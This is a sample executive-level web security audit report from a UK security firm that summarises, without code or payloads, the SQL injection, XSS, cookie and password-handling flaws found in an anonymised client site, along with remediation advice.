Brought To You By: SAS Web Security http://www.saswebsecurity.com/ Version 1.0, Dated 9 June 2012

dewberryeventΑσφάλεια

2 Νοε 2013 (πριν από 4 χρόνια και 7 μήνες)

78 εμφανίσεις


SAS Data Services Ltd. Phone: +44(0)845-539-0027 Fax: +44(0)845-539-0026 Email: info@sasdataservices.com
Trafalgar House, 1 Grenville Place, London, NW73SA, UK
Website: http://www.sasdataservices.com Registered in England & Wales, Company No. 05514218
SAS Web Security

Securing The Perimeter



Brought To You By: SAS Web Security
http://www.saswebsecurity.com/

Version 1.0, Dated 9
th
June 2012

The following is a sample website application security report that was delivered after an audit. It raises several key flaws within
the application to be addressed.
This is an executive report intended for management level. The purpose of this report is to explain and detail the tests
completed at a high level so that the management fully understand their security situation. A technical version report is also
available on the
'Sample Report'
page for the technical staff. Your technical team can use this report as a blueprint or guide to
the issues they need to repair. Please be sure to read the section entitled “What Now” at the bottom of the report, as it
advises you on the next crucial steps.

Date:

9
th

June 2012

Company:

***
Removed for Confidentiality ***

Site:

***
Removed for Confidentiality


***

Requirement:

Security Audit

Prepared By:

Adam Palmer

Report:

1 of 1

The report below covers the following type of security audit: External Silver Web Audit; Executive Report
Priority Matrix

Priority

Count

Details

Critical 3 Compromise Highly Likely
High

4

Compromise Possible/Likely

Low 2 Security/System Considerations to be Noted
Informational

0

Security/Optimization Information


Testing Levels
Level 1
The system was audited and was found to contain one or more critical baseline flaws.
Level 2

The system was audited and was found to contain
high priority flaws

however adheres to a security baseline.

Level 3
The system was audited and was not found to contain any basic medium, high or critical priority flaws. This is no
guarantee that none are present, simply that none were detected. The system has demonstrated a reasonable
level of security.
Level 4
The system was audited and was not found to contain any detectable security flaws. This is no guarantee that
none are present, simply that none were detected. The system has demonstrated a strong level of security.
Level 5
The system was audited and was not found to contain any detectable security flaws. This is no guarantee that
none are present, simply that none were detected. The system also takes a strong proactive and defensive
position with security. The system has demonstrated a very strong level of security.


SAS Data Services Ltd. Phone: +44(0)845-539-0027 Fax: +44(0)845-539-0026 Email: info@sasdataservices.com
Trafalgar House, 1 Grenville Place, London, NW73SA, UK
Website: http://www.sasdataservices.com Registered in England & Wales, Company No. 05514218
SAS Web Security

Securing The Perimeter



Executive Summary
The web application *** Removed for Confidentiality *** was manually, externally tested. A number of items were found
ranging from low to critical problems. The results are listed in order of severity where possible from high to low.
3 different categories of critical problem were detected. The problems that we found allowed us full access to the site's
database as well as allowing us the ability to access other user's accounts. We could potentially have run malicious software
within other user's browsers. These problems were not highly complex to find and exploit, and a hacker would be able to exploit
these with ease. The application was tested and confirmed at LEVEL 1
SQL Injection
An SQL injection attack is when an attacker is able to pass specific database commands through the web site directly to the
database. These commands could be to extract and view other user's passwords and account details, modify or delete data. The
problem is that the web site has not filtered such commands out, and simply passes them straight to the database. This is
obviously critical to any site that stores data. There are steps that programmers can take to prevent this from happening in
future. We have demonstrated this in the technical version of the report in more detail with sample data.
Cross Site Scripting (XSS)
During the audit, I asked you to check my profile with the excuse that it contained some kind of strange characters. At the point
that you visited that page, our XSS attack succeeded, and passed your administrative details to us, allowing us to gain access to
the administrator's control panel. This was again demonstrated in detail in technical report.
There are two types of XSS scripting to consider here, stored and reflected XSS. Both types of flaw were found in the application.
Similar to the SQL injection detailed above, this type of attack involves a malicious user being able to enter programming code
rather than just regular text. In this case however, rather than a direct server attack, this attacks other users. Perhaps site
administrators or other website users. In this sample case, it will enable an attacker to be able to begin browsing the site as if he
were logged in as the administrator without ever knowing the username and password. From there, an attacker has full access
to user information and data.
Insecure Password Handling
The mechanism used to protect passwords in the database is relatively weak and should be made stronger. This alone is not as
critical as some of the other detected flaws, but certainly features high on the list as it can easily be combined with other
attacks.

Insecure Cookies
Cookies are passed about throughout the site without encryption. Those cookies that are sent whilst under encryption can be
read back later without encryption.

This renders the SSL/HTTPS obsolete to a degree and potentially allows for users accounts to
be hijacked. It potentially does more harm than good by allowing users to believe that their session is encrypted and safe when
it can be easily hijacked.

SAS Data Services Ltd. Phone: +44(0)845-539-0027 Fax: +44(0)845-539-0026 Email: info@sasdataservices.com
Trafalgar House, 1 Grenville Place, London, NW73SA, UK
Website: http://www.sasdataservices.com Registered in England & Wales, Company No. 05514218
SAS Web Security

Securing The Perimeter



Auto Complete Password Field
The password field at *** Removed for confidentiality *** was found to have autocomplete enabled which is a security risk as
the password is stored within the user’s browser database. When a user visits the site and automatically saves his login details
with autocomplete, other users of that same PC could access his account.
Insecure POST
Data is posted from *** Removed for confidentiality *** to *** Removed for confidentiality *** unencrypted. Whilst on the site,
data that I enter into a form is sent to a 3
rd
party site. This is intentional behaviour, however it is sent unencrypted and can
therefore be intercepted.
PHP Source Code Disclosure
A minor code disclosure was located in /js/global.js containing commented server code. Whilst the finding does not disclose any
significant code, it is important to note cases where server code has been intentionally commented out, but is in fact visible to
users should they look, as this could give out all kinds of confidential or proprietary information.

Other Tests Performed and Items Noted
We scanned for sensitive development files that may have been left by the developers but did not find any by any common
names.
Summary
The audit has thrown up a number of priority action points in the application, which I recommend are addressed as a high
priority by the development team as soon as possible. The general standard of security within the application is unfortunately
quite low. Items located ranged in severity from high to low. The level of breach obtained within the audit by no means covers
the total level of breach possible. The scope was to test the *** Removed for confidentiality *** web application alone. On that
basis, it may well have been possible to attempt to attack the various other systems and servers that you are running, as well as
escalating our attacks further than we did. Deeper and more malicious attacks such as attempting to delete or modify data or
attempting to upload malicious binaries to the server were also not performed.
In light of the level of exploitation possible, it would be well recommended to consider on-going auditing, a more in-depth audit
potentially covering code, and a full audit of other servers related to the enterprise.
This audit is not a guarantee, warranty or certification of a certain level of security. The audit is not guaranteed to have found
and covered all bugs, holes or breaches, and frequent audits and testing are always recommended. All audits are conducted in
line with our TOS available at
http://www.saswebsecurity.com/terms/

What Now?

Once you've had a chance to digest the report, please get in touch to discuss the implications; what this means for you. We can
then formulate a plan together, to ensure that these and future issues are addressed.

The most important thing you can do now is take swift action to correct these flaws and protect your digital assets. While you
may or may not understand every aspect of this report, the important component that you need to understand is that

SAS Data Services Ltd. Phone: +44(0)845-539-0027 Fax: +44(0)845-539-0026 Email: info@sasdataservices.com
Trafalgar House, 1 Grenville Place, London, NW73SA, UK
Website: http://www.sasdataservices.com Registered in England & Wales, Company No. 05514218
SAS Web Security

Securing The Perimeter



vulnerabilities were found and your digital assets are at high risk of being compromised. Preventing malicious attacks is far
more cost effective than the necessary work to clean up and repair after an attack has occurred. We are available to support
and assist you and/or your development staff, whether that be in assisting and advising on repair work, or retesting once repair
work is complete.
If you don’t have IT staff capable of handling these corrections in a very timely manner, please contact me for a quote for SAS
Web Security to implement the fixes.